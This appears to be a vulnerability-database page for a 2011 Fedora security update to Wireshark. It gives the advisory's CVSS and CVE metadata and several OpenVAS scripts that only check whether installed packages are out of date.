[SECURITY] Fedora 13 Update: wireshark-1.2.16-1.fc13

2011-04-26T21:52:59

Description

Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package.

Affected Package

OS	OS Version	Package Name	Package Version
Fedora	13	wireshark	1.2.16

{"id": "FEDORA:5ED55110E1C", "vendorId": null, "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.16-1.fc13", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "published": "2011-04-26T21:52:59", "modified": "2011-04-26T21:52:59", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {}, "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2GN5O5AMS35QRYGUGD2HN2GMV45ZQQ33/", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2011-1590", "CVE-2011-1591"], "immutableFields": [], "lastseen": "2020-12-21T08:17:50", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2012-071"]}, {"type": "canvas", "idList": ["WIRESHARK_DECT"]}, {"type": "centos", "idList": ["CESA-2010:0625", "CESA-2012:0509"]}, {"type": "cert", "idList": ["VU:243670"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-358", "CPAI-2014-1112", "CPAI-2015-0163", "CPAI-2015-0388"]}, {"type": "cve", "idList": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2994", "CVE-2010-2995", "CVE-2011-1590", "CVE-2011-1591"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2066-1:00B62", "DEBIAN:DSA-2274-1:E67D3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2010-2283", "DEBIANCVE:CVE-2010-2284", "DEBIANCVE:CVE-2010-2286", "DEBIANCVE:CVE-2010-2287", "DEBIANCVE:CVE-2010-2994", "DEBIANCVE:CVE-2010-2995", "DEBIANCVE:CVE-2011-1590", "DEBIANCVE:CVE-2011-1591"]}, {"type": "fedora", "idList": ["FEDORA:22127110B4B", "FEDORA:3CD7F110688", "FEDORA:77FD910F9EE", "FEDORA:A487811127C", "FEDORA:B6CC8110BFF", "FEDORA:BFBC310F877", "FEDORA:C0E72110A4E", "FEDORA:C7FE910F926"]}, {"type": "gentoo", "idList": ["GLSA-201110-02"]}, {"type": "nessus", "idList": ["ALA_ALAS-2012-71.NASL", "CENTOS_RHSA-2010-0625.NASL", "CENTOS_RHSA-2012-0509.NASL", "DEBIAN_DSA-2066.NASL", "DEBIAN_DSA-2274.NASL", "FEDORA_2010-13416.NASL", "FEDORA_2010-13427.NASL", "FEDORA_2011-0167.NASL", "FEDORA_2011-0460.NASL", "FEDORA_2011-5529.NASL", "FEDORA_2011-5569.NASL", "FEDORA_2011-5621.NASL", "GENTOO_GLSA-201110-02.NASL", "MANDRIVA_MDVSA-2010-113.NASL", "MANDRIVA_MDVSA-2010-144.NASL", "MANDRIVA_MDVSA-2011-083.NASL", "ORACLELINUX_ELSA-2010-0625.NASL", "ORACLELINUX_ELSA-2012-0509.NASL", "REDHAT-RHSA-2010-0625.NASL", "REDHAT-RHSA-2012-0509.NASL", "SL_20100811_WIRESHARK_ON_SL3_X.NASL", "SL_20120423_WIRESHARK_ON_SL6_X.NASL", "SUSE9_12708.NASL", "SUSE_11_1_WIRESHARK-101222.NASL", "SUSE_11_2_WIRESHARK-101222.NASL", "SUSE_11_3_WIRESHARK-101222.NASL", "SUSE_11_3_WIRESHARK-110511.NASL", "SUSE_11_4_WIRESHARK-110511.NASL", "SUSE_11_WIRESHARK-110331.NASL", "SUSE_11_WIRESHARK-110503.NASL", "SUSE_WIRESHARK-7438.NASL", "SUSE_WIRESHARK-7439.NASL", "SUSE_WIRESHARK-7500.NASL", "SUSE_WIRESHARK-7501.NASL", "WIRESHARK_1_2_9.NASL", "WIRESHARK_1_4_5.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120149", "OPENVAS:1361412562310122329", "OPENVAS:1361412562310123932", "OPENVAS:136141256231067638", "OPENVAS:136141256231069984", "OPENVAS:136141256231070765", "OPENVAS:1361412562310801785", "OPENVAS:1361412562310801786", "OPENVAS:1361412562310830968", "OPENVAS:1361412562310831071", "OPENVAS:1361412562310831120", "OPENVAS:1361412562310831388", "OPENVAS:1361412562310862360", "OPENVAS:1361412562310862371", "OPENVAS:1361412562310862791", "OPENVAS:1361412562310862831", "OPENVAS:1361412562310862907", "OPENVAS:1361412562310863048", "OPENVAS:1361412562310863056", "OPENVAS:1361412562310863282", "OPENVAS:1361412562310870307", "OPENVAS:1361412562310870606", "OPENVAS:1361412562310880413", "OPENVAS:1361412562310881173", "OPENVAS:1361412562310902195", "OPENVAS:1361412562310902196", "OPENVAS:1361412562310902198", "OPENVAS:1361412562310902199", "OPENVAS:1361412562310903022", "OPENVAS:1361412562310903023", "OPENVAS:67638", "OPENVAS:69984", "OPENVAS:70765", "OPENVAS:801785", "OPENVAS:801786", "OPENVAS:830968", "OPENVAS:831071", "OPENVAS:831120", "OPENVAS:831388", "OPENVAS:862360", "OPENVAS:862371", "OPENVAS:862791", "OPENVAS:862831", "OPENVAS:862907", "OPENVAS:863048", "OPENVAS:863056", "OPENVAS:863282", "OPENVAS:870307", "OPENVAS:870606", "OPENVAS:880413", "OPENVAS:881173", "OPENVAS:902195", "OPENVAS:902196", "OPENVAS:902198", "OPENVAS:902199", "OPENVAS:903022", "OPENVAS:903023"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0625", "ELSA-2012-0509", "ELSA-2013-1569"]}, {"type": "osv", "idList": ["OSV:DSA-2066-1", "OSV:DSA-2274-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:100563", "PACKETSTORM:107229", "PACKETSTORM:109341", "PACKETSTORM:109342"]}, {"type": "redhat", "idList": ["RHSA-2010:0625", "RHSA-2012:0509"]}, {"type": "saint", "idList": ["SAINT:0E14D95E0722AF66CB8D0704BB89125C", "SAINT:87BC0D6AC5A65F50E450B2FF0EBD2543", "SAINT:957CD90293FBA36DE518445A41B0E05B", "SAINT:BDA51C29908C7EA6D082B06FCC37FF92", "SAINT:D42BF0A06302C4D52A87233BC36F2B8A", "SAINT:D7865E18B6BBAD4717C53FC6C4183F42", "SAINT:E36C6214A5DCBCA14BAC2168E800BE84", "SAINT:E68DD87E4FF5685E3D998F4BCDAA724F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26372", "SECURITYVULNS:VULN:10928", "SECURITYVULNS:VULN:11678"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-2283", "UB:CVE-2010-2284", "UB:CVE-2010-2286", "UB:CVE-2010-2287", "UB:CVE-2010-2994", "UB:CVE-2010-2995", "UB:CVE-2011-1590", "UB:CVE-2011-1591"]}, {"type": "veracode", "idList": ["VERACODE:24234", "VERACODE:24235", "VERACODE:24236", "VERACODE:24237", "VERACODE:25009"]}]}, "score": {"value": 1.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2012-071"]}, {"type": "canvas", "idList": ["WIRESHARK_DECT"]}, {"type": "centos", "idList": ["CESA-2010:0625", "CESA-2012:0509"]}, {"type": "cve", "idList": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2011-1590", "CVE-2011-1591"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2274-1:E67D3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2010-2283", "DEBIANCVE:CVE-2010-2284", "DEBIANCVE:CVE-2010-2286", "DEBIANCVE:CVE-2010-2287", "DEBIANCVE:CVE-2011-1590", "DEBIANCVE:CVE-2011-1591"]}, {"type": "fedora", "idList": ["FEDORA:C0E72110A4E"]}, {"type": "gentoo", "idList": ["GLSA-201110-02"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_PACKET_DECT", "MSF:EXPLOIT/WINDOWS/MISC/WIRESHARK_PACKET_DECT"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2066.NASL", "DEBIAN_DSA-2274.NASL", "MANDRIVA_MDVSA-2010-144.NASL", "SL_20120423_WIRESHARK_ON_SL6_X.NASL", "SUSE9_12708.NASL", "SUSE_11_3_WIRESHARK-101222.NASL", "SUSE_11_4_WIRESHARK-110511.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310862791", "OPENVAS:1361412562310862831", "OPENVAS:1361412562310880413", "OPENVAS:801786"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0509"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:109342"]}, {"type": "saint", "idList": ["SAINT:E36C6214A5DCBCA14BAC2168E800BE84"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26372"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-2286"]}]}, "exploitation": null, "vulnersScore": 1.7}, "_state": {"dependencies": 1660004461, "score": 1659891775}, "_internal": {"score_hash": "244c9ba758fab7e7958f2af7a40017b1"}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "13", "arch": "any", "packageName": "wireshark", "packageVersion": "1.2.16", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"openvas": [{"lastseen": "2019-05-29T18:39:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-05T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-5529", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2011-1590", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-1591"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863056", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863056", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-5529\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058993.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863056\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-05 07:14:22 +0200 (Thu, 05 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-5529\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-1590\", \"CVE-2011-1591\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-5529\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:50", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-05-05T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-5529", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2011-1590", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-1591"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863056", "href": "http://plugins.openvas.org/nasl.php?oid=863056", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-5529\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058993.html\");\n script_id(863056);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-05 07:14:22 +0200 (Thu, 05 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-5529\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-1590\", \"CVE-2011-1591\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-5529\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-01-14T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-0167", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286", "CVE-2010-4538"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310862791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862791", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-0167\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-January/053061.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862791\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-14 16:07:43 +0100 (Fri, 14 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-0167\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-4538\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-0167\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.13~2.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:05:55", "description": "The remote host is missing an update to wireshark\nannounced via advisory DSA 2066-1.", "cvss3": {}, "published": "2010-07-06T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2066-1 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:136141256231067638", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067638", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2066_1.nasl 8485 2018-01-22 07:57:57Z teissa $\n# Description: Auto-generated from advisory DSA 2066-1 (wireshark)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the Wireshark\nnetwork traffic analyzer. It was discovered that null pointer\ndereferences, buffer overflows and infinite loops in the SMB, SMB\nPIPE, ASN1.1 and SigComp dissectors could lead to denial of service\nor the execution of arbitrary code.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.0.2-3+lenny9.\n\nFor the upcoming stable distribution (squeeze) and the unstable\ndistribution (sid), these problems have been fixed in version\n1.2.9-1.\n\nWe recommend that you upgrade your wireshark packages.\";\ntag_summary = \"The remote host is missing an update to wireshark\nannounced via advisory DSA 2066-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202066-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67638\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-06 02:35:12 +0200 (Tue, 06 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\");\n script_name(\"Debian Security Advisory DSA 2066-1 (wireshark)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:05:20", "description": "Check for the Version of rpmdrake", "cvss3": {}, "published": "2010-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:1361412562310830968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"rpmdrake on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"This update fixes rpmdrake behavior when suggesting packages from\n disabled backports media (#40556).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00001.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830968\");\n script_version(\"$Revision: 8440 $\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\",\n \"CVE-2010-2287\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVA\", value: \"2010:113\");\n script_name(\"Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of rpmdrake\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"rpmdrake\", rpm:\"rpmdrake~5.23.1~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:54:28", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-06-11T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2010:113 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:1361412562310831071", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831071", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2010:113 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# 